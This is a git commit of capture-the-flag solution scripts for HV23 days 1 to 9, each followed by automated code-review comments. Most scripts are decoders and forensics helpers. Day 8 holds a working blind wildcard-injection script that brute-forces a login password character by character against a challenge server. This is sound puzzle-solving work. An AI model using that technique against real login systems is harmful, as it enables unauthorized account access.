Initial Commit Day 1-9
commit
697849f63e
BIN
Day 1/a-letter-from-santa.zip
Normal file
BIN
Day 1/a-letter-from-santa.zip
Normal file
Binary file not shown.
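--- /dev/null
+++ b/Day 1/decode.py
@@ -0,0 +1,32 @@
+import string
+from bs4 import BeautifulSoup
+from PIL import Image
+from pyzbar.pyzbar import decode
+
+qr_size = 25
+pix_size = 10
+img_size = pix_size * qr_size
+
+with open("templates/santa.j2", "r") as f:
+soup = BeautifulSoup(f.read(), "html.parser")
+img = Image.new("RGB", (img_size, img_size), "white")
+y = 0
+
+for c in string.ascii_lowercase:
+bin_str = ""
+x = 0
+for e in soup.find_all("span"):
+if e.text.strip() == "{{" + c + "}}":
+if "a" in e["class"]:
+color = (0, 0, 0)
+else:
+color = (255, 255, 255)
+
+for xi in range(x, x+pix_size):
+for yi in range(y, y+pix_size):
+img.putpixel((xi, yi), color)
+
+x += pix_size
+y += pix_size
+
+print("[+] Flag:", decode(img)[0].data.decode())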
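Review bot: `decode(img)[0]` on the last line assumes pyzbar recognised a symbol; `decode()` returns an empty list when it finds nothing, so a mis-rendered grid ends in a bare IndexError. Bind the result and fail explicitly, e.g. `codes = decode(img)` followed by `if not codes: raise SystemExit("no QR code decoded")`. `bin_str` is assigned in the outer loop and never read, so it can be dropped. A short comment saying that each placeholder letter is one row of the grid and that class `a` marks a dark module would make the mapping readable without opening santa.j2.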
2
Day 1/templates/santa.j2
Normal file
2
Day 1/templates/santa.j2
Normal file
File diff suppressed because one or more lines are too long
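--- /dev/null
+++ b/Day 2/decode.py
@@ -0,0 +1,3 @@
+data = "G d--? s+: a+++ C+++$ UL++++$ P--->$ L++++$ !E--- W+++$ N* !o K--? w O+ M-- V PS PE Y PGP++++ t+ 5 X R tv-- b DI- D++ G+++ e+++ h r+++ y+++"
+# "PGP++++" -> Philip Zimmerman
+print("[+] Flag: HV23{Philip Zimmerman}")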
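--- /dev/null
+++ b/Day 3/decode.py
@@ -0,0 +1,58 @@
+data = [
+["8","c","t","k","3"],
+["2","r","H","V","r"],
+["2","y",None,"0","v"],
+["2","e","n","3","_"],
+["}","3","h","{","m"],
+]
+
+def find_char(c, min=(0, 0)):
+for x, row in enumerate(data):
+for y, v in enumerate(row):
+if v == c and (x, y) >= min:
+return (x, y)
+
+
+def find_key(cirb="HV23{"):
+min = (0, 0)
+key = []
+for c in cirb:
+key.append(find_char(c, min))
+min = key[-1]
+key[3] = (4, 1) # or (3, 3)
+key.append(rotate(find_char('}'), 3)) # for final '}'
+return key
+
+def rotate(key, rotation):
+rotation = rotation % 4
+if rotation == 0:
+return key
+
+n = len(data) - 1
+rotated = []
+
+if isinstance(key, list):
+for (x, y) in key:
+rotated.append((y, n - x))
+else:
+rotated = (key[1], n - key[0])
+
+if rotation > 1:
+return rotate(rotated, rotation - 1)
+
+return rotated
+
+def get_text(key, rotation=0):
+text = ""
+key = list(sorted(rotate(key, rotation)))
+for (x, y) in key:
+text += data[x][y]
+return text
+
+key = find_key()
+
+flag = ""
+for i in range(0, 4):
+flag += get_text(key, -i)
+
+print("[+] Flag:", flag)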
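Review bot: `find_char` falls off the end and returns None when `c` does not occur at or after `min`, and `find_key` appends that result and reuses it as the next `min`, so a miss only surfaces later as a TypeError in the tuple comparison `(x, y) >= min`. Raising at the point of failure is clearer, e.g. `raise ValueError(f"{c!r} not found at or after {min}")` as the last statement of `find_char`. The parameter and local named `min` shadow the builtin; `start` would read better. `key[3] = (4, 1) # or (3, 3)` overrides the search result by hand and needs a comment saying why the searched position is wrong for the fourth character. Indentation is not visible on this page, so the block boundaries referred to here are inferred.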
BIN
Day 4/bowser.elf
Executable file
BIN
Day 4/bowser.elf
Executable file
Binary file not shown.
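--- /dev/null
+++ b/Day 4/decode.py
@@ -0,0 +1,26 @@
+from hackingscripts import util
+from pwn import context, disasm
+import re
+
+if __name__ == "__main__":
+with open("bowser.elf", "rb") as f:
+elf = f.read()
+
+context.arch = "amd64"
+offset = 0x1332
+flag = b""
+
+for instr in disasm(elf[offset:], byte=False, offset=False).split("\n"):
+match = re.match(r"movabs\s+(rax|rdx),\s+0x([0-9a-f]+)", instr)
+if match:
+flag += util.xor(bytearray.fromhex(match[2])[::-1], 0xFF)
+else:
+match = re.match(r"mov\s+WORD PTR \[.*\],\s+0x([0-9a-f]+)", instr)
+if match:
+flag += util.xor(bytearray.fromhex(match[1])[::-1], 0xFF)
+elif re.match(r"call\s+.*", instr):
+break
+
+flag = flag.split(b"\x00")[1].decode()
+print("[+] Flag:", flag)
+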
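Review bot: Both `bytearray.fromhex(match[...])` calls depend on the disassembler printing an even number of hex digits at full operand width. Immediates are normally printed without zero padding, so a value whose top nibble is zero would raise ValueError and one whose top byte is zero would silently lose a byte; this sample presumably avoids both because every XOR-0xFF-encoded byte is 0x80 or above. Converting by operand width is sturdier: `bytearray(int(match[2], 16).to_bytes(8, "little"))` for the `movabs` case and `bytearray(int(match[1], 16).to_bytes(2, "little"))` for the `WORD PTR` case, which also removes the `[::-1]`. The file offset `0x1332` and the `[1]` index after `split(b"\x00")` are unexplained constants and each deserves a one-line comment saying what it selects.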
BIN
Day 5/aurora.mp4
Normal file
BIN
Day 5/aurora.mp4
Normal file
Binary file not shown.
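--- /dev/null
+++ b/Day 5/decode.py
@@ -0,0 +1,47 @@
+from PIL import Image
+import os
+import sys
+import operator
+import subprocess
+import shutil
+
+def extract_frames(destination):
+os.makedirs(destination, exist_ok=True)
+subprocess.run(["ffmpeg", "-i", "aurora.mp4", "frames/out-%03d.png"])
+print()
+
+def parse_frame(file):
+img = Image.open(file)
+pix = img.load()
+return img.size, pix
+
+if __name__ == "__main__":
+
+output_directory = "frames"
+pixel_sum = None
+count = 0
+
+extract_frames(output_directory)
+for file in sorted(os.listdir(output_directory)):
+if file.endswith(".png"):
+sys.stdout.write(f"\rAnalyzing: {file}")
+(width, height), pix = parse_frame(os.path.join(output_directory, file))
+if pixel_sum is None:
+pixel_sum = [[(0,0,0) for y in range(height)] for x in range(width)]
+
+for x in range(width):
+for y in range(height):
+pixel_sum[x][y] = tuple(map(operator.add, pixel_sum[x][y], pix[x,y]))
+
+count += 1
+
+print("\nComposing new image")
+img = Image.new("RGB", (width, height))
+pix = img.load()
+
+for x in range(width):
+for y in range(height):
+pix[x,y] = tuple(map(operator.floordiv, pixel_sum[x][y], [count] * 3))
+
+img.save(f"result.png")
+shutil.rmtree(output_directory)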
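Review bot: `extract_frames` ignores its `destination` argument in the ffmpeg call and does not check the exit status. The output pattern is the literal `frames/out-%03d.png`, and if ffmpeg fails the directory stays empty and the script continues to `Image.new("RGB", (width, height))` with `width` never assigned. Suggest `subprocess.run(["ffmpeg", "-i", "aurora.mp4", os.path.join(destination, "out-%03d.png")], check=True)`. The final `shutil.rmtree(output_directory)` also deletes a `frames` directory that existed before the run, since it was opened with `exist_ok=True`; `tempfile.TemporaryDirectory()` would avoid touching anything the script did not create.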
BIN
Day 5/result.png
Normal file
BIN
Day 5/result.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 296 KiB |
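--- /dev/null
+++ b/Day 6/.gitattributes
@@ -0,0 +1 @@
+memory.raw filter=lfs diff=lfs merge=lfs -text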
BIN
Day 6/cool-santa-claus.jpg
Normal file
BIN
Day 6/cool-santa-claus.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 186 KiB |
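--- /dev/null
+++ b/Day 6/extract.sh
@@ -0,0 +1,3 @@
+vol -f memory.raw windows.info
+vol -f memory.raw windows.filescan | grep -i "png\|jpg\|jpeg"
+vol -f memory.raw windows.dumpfiles --virtaddr 0x918b76c517f0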
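Review bot: The `--virtaddr 0x918b76c517f0` value in the third command is specific to this memory image, and nothing records which `windows.filescan` row it was taken from. A comment above it naming the file object it refers to would let a reader reproduce the step. The script has no shebang and no `set -e`, so a failed `vol` call on the first line does not stop the later ones. The filescan over the image is also re-run on every invocation; the committed files.txt presumably holds that output already, in which case grepping it would be enough.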
4480
Day 6/files.txt
Executable file
4480
Day 6/files.txt
Executable file
File diff suppressed because it is too large
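--- /dev/null
+++ b/Day 6/memory.raw
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0d38311133ba9580a4bac36aee55f4f08a75f0462cc040907a179ad4b4351c87
+size 2147483648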
BIN
Day 6/wallpaper.png
Normal file
BIN
Day 6/wallpaper.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 1.6 MiB |
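--- /dev/null
+++ b/Day 7/exploit.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+import string
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+
+import socket
+from PIL import Image
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+HOST = "44c5decd-6619-4ce0-859a-882ed74f1736.rdocker.vuln.land"
+IP_ADDRESS = util.get_address()
+
+def get_image_bytes():
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((HOST, 80))
+sock.sendall(b"\n")
+
+data = b""
+
+while True:
+b = sock.recv(1024)
+if not b:
+break
+
+data += b
+
+body_offset = data.index(b"\n\n") # malformed here
+header, body = data[:body_offset], data[body_offset+2:]
+
+return header, body
+
+if __name__ == "__main__":
+
+header, body = get_image_bytes()
+
+flag = ""
+while body:
+offset_index = body.index(b"\r\n")
+chunk_size = int(body[0:offset_index], 16)
+offset = offset_index + 2
+chunk = body[offset:offset+chunk_size]
+body = body[offset+chunk_size+2:]
+
+if chunk_size > 0x900:
+flag += chr(chunk_size & 0xFF)
+
+print("[+] Flag:", flag)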
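Review bot: The socket opened in `get_image_bytes` is never closed and has no timeout, so the `recv` loop blocks indefinitely if the server keeps the connection open. `with socket.create_connection((HOST, 80), timeout=10) as sock:` covers both. `data.index(b"\n\n")` and the later `body.index(b"\r\n")` raise a bare ValueError on a truncated response, and the `# malformed here` remark should say what framing the parser actually expects. Most of the template imports (`subprocess`, `rev_shell`, `HttpFileServer`, `Image` and others) are unused, and the module-level `disable_warnings(...)` call silences certificate warnings in a script that makes no HTTPS request; both can be removed.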
BIN
Day 8/bask-source.zip
Normal file
BIN
Day 8/bask-source.zip
Normal file
Binary file not shown.
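--- /dev/null
+++ b/Day 8/exploit.py
@@ -0,0 +1,85 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import string
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+BASE_URL = "https://a26e7e66-6235-404e-8c62-051b082e0082.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
+IP_ADDRESS = util.get_address()
+
+def request(method, uri, **kwargs):
+if not uri.startswith("/") and uri != "":
+uri = "/" + uri
+
+client = requests
+if "session" in kwargs:
+client = kwargs["session"]
+del kwargs["session"]
+
+if "allow_redirects" not in kwargs:
+kwargs["allow_redirects"] = False
+
+if "verify" not in kwargs:
+kwargs["verify"] = False
+
+if "proxies" not in kwargs:
+kwargs["proxies"] = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
+
+return client.request(method, BASE_URL + uri, **kwargs)
+
+def login(password):
+while True:
+# post payload is not URL decoded, so we can't use dictionary
+res = request("POST", "/login", data=f"password={password}")
+if "Successfully logged in" in res.text:
+return True
+elif "Invalid username or password!" in res.text:
+return False
+
+def retrieve_flag(cookie):
+while True:
+res = request("GET", "/admin", cookies={"admin_token": cookie})
+util.assert_content_type(res, "text/html")
+if "You are not authorized to view this page." in res.text:
+return None
+else:
+match = re.search(r"Your flag is: (HV23\{.*\})", res.text)
+if match:
+return match[1]
+
+
+if __name__ == "__main__":
+password = "salami"
+flag = retrieve_flag(password)
+while flag is None:
+found = False
+for x in string.printable:
+if x in ["*", "\\"]:
+continue
+
+if login(password + x + "*"):
+password += x
+found = True
+flag = retrieve_flag(password)
+break
+
+if not found:
+break
+
+print("[+] Flag:", flag)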
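Review bot: `request()` defaults `verify` to `False` and routes through a hard-coded proxy at 127.0.0.1:8080, while the module-level `disable_warnings(...)` call hides the resulting warning, so every call is sent without certificate validation unless the caller opts back in. Making both opt-in (from a command-line flag, the way `LOCAL` already is) keeps the default path verified and lets the script run without a local proxy listening. Separately, `login()` and `retrieve_flag()` loop with `while True` and return only on specific response strings, so any other response, such as an error page, repeats the request forever with no delay or attempt cap. A bounded retry that sleeps briefly and raises once exhausted would make that failure visible instead of flooding the service.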
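--- /dev/null
+++ b/Day 9/decode.py
@@ -0,0 +1,22 @@
+import os
+import re
+import datetime
+from bs4 import BeautifulSoup
+from hackingscripts.pcap_file_extract import PcapExtractor, HttpRequest, HttpResponse
+
+if __name__ == "__main__":
+
+chars = []
+pcap_extractor = PcapExtractor("secret_capture.pcapng")
+for response in pcap_extractor:
+match = re.match(r"/\?door=(\d)", response.get_file_path())
+if match and isinstance(response, HttpResponse):
+request = response.response_to
+ip, port = request.socket.split(":")
+port = int(port)
+c = chr(port - 56700)
+dt = datetime.datetime.strptime(response.headers["Date"], "%a, %d %b %Y %H:%M:%S %Z").timestamp()
+chars.append((dt, c))
+
+flag = "".join(entry[1] for entry in sorted(chars))
+print("[+] Flag:", flag)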
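Review bot: `sorted(chars)` orders by the whole `(dt, c)` tuple, and the HTTP `Date` header has one-second resolution, so two responses stamped in the same second come out in character order rather than capture order. Sorting on the timestamp only, `sorted(chars, key=lambda entry: entry[0])`, keeps ties in the order the extractor yielded them because Python's sort is stable; whether that equals capture order depends on `PcapExtractor`, which is not visible here. `chr(port - 56700)` raises ValueError for a source port below 56700, so a range check before it would skip unrelated connections cleanly. `os`, `BeautifulSoup` and `HttpRequest` are imported but unused.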
BIN
Day 9/secret_capture.pcapng
Normal file
BIN
Day 9/secret_capture.pcapng
Normal file
Binary file not shown.